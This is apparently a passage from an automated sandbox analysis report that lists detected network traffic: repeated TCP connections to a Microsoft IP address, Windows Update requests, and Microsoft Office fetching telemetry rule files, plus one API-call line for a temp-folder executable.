Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EBCE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 7_2_00EBCE44
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KpNnL6yXzLT7T33&MD=H6NOomws HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
